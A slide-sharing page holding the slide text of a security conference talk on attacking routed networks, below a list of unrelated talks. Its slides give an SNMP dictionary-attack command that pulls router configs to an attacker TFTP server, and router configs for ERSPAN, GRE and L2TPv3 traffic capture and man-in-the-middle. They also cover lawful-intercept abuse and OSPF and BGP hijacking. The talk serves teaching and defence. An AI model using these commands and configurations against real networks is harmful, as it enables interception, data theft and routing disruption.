Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 

Recently uploaded (20)

Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 

TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin

  • 2. Bending and Twisting Networks Rocket City - TakeDownCon Paul Coggin Internetwork Consulting Solutions Architect paul.coggin@dynetics.com @PaulCoggin D-13-2856 2
  • 3. Bio of Author •  Network Security Architect – 18 Years Experience •  BS Math, MS Computer Information Systems, and Graduate Studies in IA and Security •  Certifications: EC-Council, Cisco, and ISC^2 •  EC-Council and Cisco Instructor •  Utility, Telecommunications, and Service Provider Experience -  Transport: Optical(DWDM, SONET), MPLS, 10G Ethernet -  Services: Voice, IPTV, Internet, MetroE, DSL -  OSS and Network Management -  Access Networks: Cable ISP, DSL, FTTX, GPON, Wireless, ATM, and Frame Relay -  Security: Penetration Testing, Security Architecture, and Vulnerability Analysis -  Routing and Switching D-13-2856 3
  • 4. SNMP Blow Defeat SNMP w/ACL $ snmpblow.pl -s <NetMgt IP> -d <Target IP> -t <TFTP IP> -f cfg.txt < communities.txt Attacker Network Target Network Internet SNMP Dictionary Attack with IP spoof R&S SNMP ACL Filtered TFTP Server Upon guessing the SNMP community string the configuration file is downloaded to the attacker TFTP server Trusted Device Layer 2 and L3 Anti-spoof protection with a complex SNMP community string is recommended. SNMPv3 is highly encouraged. Reference: http://www.scanit.be/en_US/snmpblow.html D-13-2856 4
  • 5. Policy Routing Override IP Routing Table       ISP A Internet A Route Map can over ride IP routing table and redirect specific traffic flows ISP B -Compromised Scenario 1 – Redirect Outbound Internet Rouge 4G router Scenario 2 – Redirect Traffic of interest out 4G or other RF network for undetected exfiltration Scenario 3 – Redirect Traffic of interest to enable a layer 3 Man in the Middle Attack Si   Vlan 3 Vlan 4 Vlan 2   Attacker System   -  Packet Sniffer -  IP Forwarding     Reference http://ptgmedia.pearsoncmg.com/images/1587052024/samplechapter/1587052024content.pdf D-13-2856 D-13-2856 5
  • 6. GRE Tunnel Utilized to Sniff Across WAN Target Network   Hacked Router     Attacker Network Internet Packet Analyzer           -  -  -  -  GRE Tunnel is configured on the hacked router and the attacker’s router GRE Tunnel interfaces must be in common subnet Configure ACL to define traffic of interest on the hacked router Define a route map with the ACL and set the next hop to the attacker’s GRE tunnel interface IP address -  Similarly define an ACL & route map on the attacker router to redirect traffic to the packet analyzer Reference: http://www.symantec.com/connect/articles/cisco-snmp-configuration-attack-gre-tunnel 6 D-13-2856 D-13-2856
  • 7. ERSPAN Enable Packet Capture Across Routed Network Target Network Hacked Router Attacker Network Internet Exfiltration of packet captures ERSPAN sends traffic over a GRE tunnel Packet Analyzer monitor session < session ID > type erspan-source source interface GigabitEthernet1/0/1 rx source interface GigabitEthernet1/0/2 tx source interface GigabitEthernet1/0/3 both destination erspan-id < erspan-flow-ID > ip address < remote ip > origin ip address < source IP > monitor session < session ID > type erspan-destination Source ip address < source IP > erspan-id < erspan-flow-ID > destination interface GigabitEthernet2/0/1 References: http://www.cisco.com/en/US/docs/ios/ios_xe/lanswitch/configuration/guide/span_xe.pdf D-13-2856 D-13-2856 7
  • 8. DLSw Overview IBM Controller IBM Mainframe or AS 400 SDLC IPv4 Routed Backbone dlsw local-peer peer-id 192.168.2.1 dlsw remote-peer 0 tcp 192.168.3.1 dlsw bridge-group 1 ! interface Serial0/0 Ip address 192.168.1.2 255.255.255.0 ! interface Ethernet0/0 ip address 192.168.2.1 255.255.255.0 ! interface Serial0/1 description IBM controller configuration no ip address no ip directed-broadcast encapsulation sdlc no keepalive clockrate 56000 sdlc role prim-xid-poll sdlc vmac 0030.0000.8100 sdlc address C0 sdlc partner 4000.80c0.4040 C0 sdlc dlsw C0 ! bridge 1 protocol ieee dlsw local-peer peer-id 192.168.3.1 dlsw remote-peer 0 tcp promiscuous dlsw bridge-group 1 ! Interface serial0/0 Ip address 192.168.1.1 255.255.255.0 ! interface ethernet 0/0 ip address 192.168.3.1 255.255.255.0 bridge-group 1 ! bridge 1 protocol ieee DLSw is used to tunnel SNA and Netbios over IP References: http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a0080093ece.shtml http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a00801434cd.shtml?referring_site=smartnavRD 8 D-13-2856 D-13-2856
  • 9. Tunnel IPv6 Over IPv4 Using DLSw If a router can be compromised with software that supports DLSw a host may be able to tunnel IPv6 traffic across the IPv4 routed Internet. This is not a documented or supported capability by Cisco. dlsw local-peer peer-id 192.168.2.1 dlsw remote-peer 0 tcp 192.168.3.1 dlsw bridge-group 1 ! interface Serial0/0 Ip address 192.168.1.2 255.255.255.0 ! interface FastEthernet0/0 ip address 192.168.2.1 255.255.255.0 bridge-group 1 ! ! bridge 1 protocol ieee IPv4 Routed Backbone IPv6 MITM across the DLSw tunnel??? To be Tested…. dlsw local-peer peer-id 192.168.3.1 dlsw remote-peer 0 tcp promiscuous dlsw bridge-group 1 ! Interface serial0/0 Ip address 192.168.1.1 255.255.255.0 ! Interface FastEthernet 0/0 ip address 192.168.3.1 255.255.255.0 bridge-group 1 ! bridge 1 protocol ieee References: http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a0080093ece.shtml http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a00801434cd.shtml?referring_site=smartnavRD 9 D-13-2856 D-13-2856
  • 10. L2TPv3 Overview Pseudo-wire Layer 2 Connection Across Service Provider WAN       L2TPv3 Tunnel CE PE P PE CE Tunnel DSL PPPoE Subscribers Across the Service Provider Infrastructure for Termination at a Third Party Service Provider – Wholesale DSL Busiess Model           D-13-2856 D-13-2856 10
  • 11. L2TPv3 MITM Across the Internet Target Network   Hacked Router     1.1.1.1 Attacker Network PE PE Internet 2.2.2.2 L2TPv3 Tunnel ARP Poison across the Internet Common Layer 2 Network l2tp-class l2tp-defaults retransmit initial retries 30 cookie-size 8 pseudowire-class ether-pw encapsulation l2tpv3 protocol none ip local interface Loopback0 interface Ethernet 0/0 xconnect 2.2.2.2 123 encapsulation l2tpv3 manual pw-class ether-pw l2tp id 222 111 l2tp cookie local 4 54321 l2tp cookie remote 4 12345 l2tp hello l2tp-defaults l2tp-class l2tp-defaults retransmit initial retries 30 cookie-size 8 pseudowire-class ether-pw encapsulation l2tpv3 protocol none ip local interface Loopback0 interface Ethernet 0/0 xconnect 1.1.1.1 123 encapsulation l2tpv3 manual pw-class ether-pw l2tp id 222 111 l2tp cookie local 4 54321 l2tp cookie remote 4 12345 l2tp hello l2tp-defaults          Reference: http://www.cisco.com/en/US/docs/ios-xml/ios/wan_lserv/configuration/xe-3s/asr1000/wan-l2-tun-pro-v3-xe.pdf D-13-2856 D-13-2856 11
  • 12. Lawful Intercept Overview Voice-Call Agent Data-Radius, AAA Configuration Commands LI Administration Function Intercepting Control Element (ICE) Router Switch Request IRI Request Law Enforcement Agency (LEA) Mediation Device Collection Function Content Mediation Device Service Provider UDP Transport for Delivery SNMPv3 Reference: http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.2SX/lawful/intercept/65LI.pdf http://www.cisco.com/en/US/docs/routers/asr9000/software/asr9k_r4.1/security/configuration/guide/syssec_cg41asr9k_chapter3.pdf D-13-2856 D-13-2856 12
  • 13. Lawful Intercept Identify Physical Source of Traffic DHCP request DHCP request with sub ID in Option identifier (RFC 3046) DHCP response with IP address Ethernet Access Domain MAC A MAC B ISP DSL CPE MAC C IP DSLAM PE-AGG L3VPN-PE ADSL modem Example Enterprise Network DHCP Server DHCP with Option 82 Support DHCP Option 82 provides the DSLAM and Switch Name and the Physical Interface That Requested a DHCP IP Address D-13-2856 D-13-2856 13
  • 14. Lawful Intercept Exploit Scenario Target Network   Hacked Router     Destination Network Internet Attacker Network LI SNMP Trap Duplicate Copy of All Packets of Interest Packet Analyzer Snmp-server view <view-name> ciscoTap2MIB included Snmp-server view <view-name> ciscoIpTapMIB included Snmp-server group <group-name> v3 auth read <view-name> write <view-name) notify <view-name> Snmp-server host <ip-address> traps version 3 priv <username> udp-port <port-number> Snmp-server user <mduser-id> <groupname> v3 auth md5 <md-password>         References:   http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.2SX/lawful/intercept/65LI.pdf http://www.cisco.com/en/US/docs/routers/asr9000/software/asr9k_r4.1/security/configuration/guide/syssec_cg41asr9k_chapter3.pdf D-13-2856 D-13-2856 14
  • 15. Two-Way Connection Via NAT Pivot to Target Cloud Provider Attacking System Managed IPTV Service Provider Internet IPTV Head End Default Route (MCAST RPF) Billing System Integration Middleware Target is the SAT IPTV Head End. Attacker is trying to pivot from Service Provider Network. Servers have route pointing back to SAT with no route to Internet. If the attacker can compromise the HE router then configure NAT two-way communication to the servers can be established. Setup Static NAT Translation No Route TV   downstream Routers Video On Demand Services upstream Head End Router Fiber Node C M RF Combiner STB                   Message On-­‐Line Network Guide p Power Ch   Menu USelect NLC Ch  Dn Multicast Video 3 D-13-2856 D-13-2856 IPTV SM Cable Modem Termination System (CMTS) Cable Routers 15 Pivot off Servers and Exploit Trust to target Cloud IPTV Provider
  • 16. OSPF Overview       -  -  -  -  OSPF runs the SPF Algorithm OSPF advertises updates, routes etc with LSA’s Routes determined based on link cost Clear / MD5 Authentication Autononynmous System Border Router (ASBR) External Networks RIP, EIGRP, BGP, ISIS Area 0           Area 1 Area Border Router (ABR) ABR Area 2 Reference: http://www.cisco.com/en/US/tech/tk365/technologies_white_paper09186a0080094e9e.shtml D-13-2856 D-13-2856 16
  • 17. Hack the Network Via OSPF       Autononynmous System Border Router (ASBR) External Network BGP, EIGRP, ISIS Area 0 Area 1 ABR DR           D-13-2856 D-13-2856 BDR Area Border Router (ABR) Area 2 OSPF Exploit Tools -  -  -  -  -  -  -  -  -  -  -  -  -  -  Quagga NRL Core(Network Simulator) Nemesis Loki G3SNDynamips Buy a router on eBay Hack a router and reconfigure Code one with Scapy IP Sorcery( IP Magic) Cain & Able to crack OSPF MD5 MS RRAS NetDude Collasoft Capsa Phenoelit IRPAS OSPF typically is implemented without any thought to security. LSA’s are multicast on the spoke LAN for any user to sniff without MD5. OSPF Attack Vectors -  Take over as DR - Inject routes to mask source of attack - DoS -  Inject routes for MITM - Add new routes to hacked router - Change interface bandwidth or use IP OSPF Cost for traffic engineering on hacked router 17
  • 18. BGP Overview       AS 1 Route Reflector Route Reflector IBGP EBGP EBGP EBGP EBGP L2 Cross Connect   AS 4   AS 2 AS 3       References: http://www.cisco.com/en/US/tech/tk365/technologies_tech_note09186a00800c95bb.shtml#howbgpwork http://www.cisco.com/en/US/tech/tk365/tk80/tsd_technology_support_sub-protocol_home.html?referring_site=bodynav D-13-2856 D-13-2856 18
  • 19. BGP Layer 2 Cross Connect Attacks - ARP Poisoning  - DoS  - Route Injection - How about ERSPAN,  L2Tpv3 or Lawful Intercept? Route Reflector AS 1 Route Reflector IBGP EBGP EBGP L2 Cross Connect           D-13-2856 D-13-2856 AS 2 EBGP AS 4 ERSPAN Destination AS 3 AS 5 Packet Analysis 19
  • 20. BGP Hijack IP Network       AS 1 AS 5 Route Reflector Route Reflector Hijack a AS 4 IP subnet /24 AS 6 IBGP EBGP AS 7 EBGP EBGP L2 Cross Connect           D-13-2856 D-13-2856 AS 2 AS 3 The Longest IP Prefix Wins 20 AS 4
  • 21. BGP IP Network and AS Hijacking AS 1       AS 5 Route Reflector Route Reflector AS 6 IBGP EBGP EBGP AS 2     Hijack AS 4   & IP subnet /24     D-13-2856 D-13-2856 EBGP L2 Cross Connect AS 3 The Longest IP Prefix Wins 21 AS 4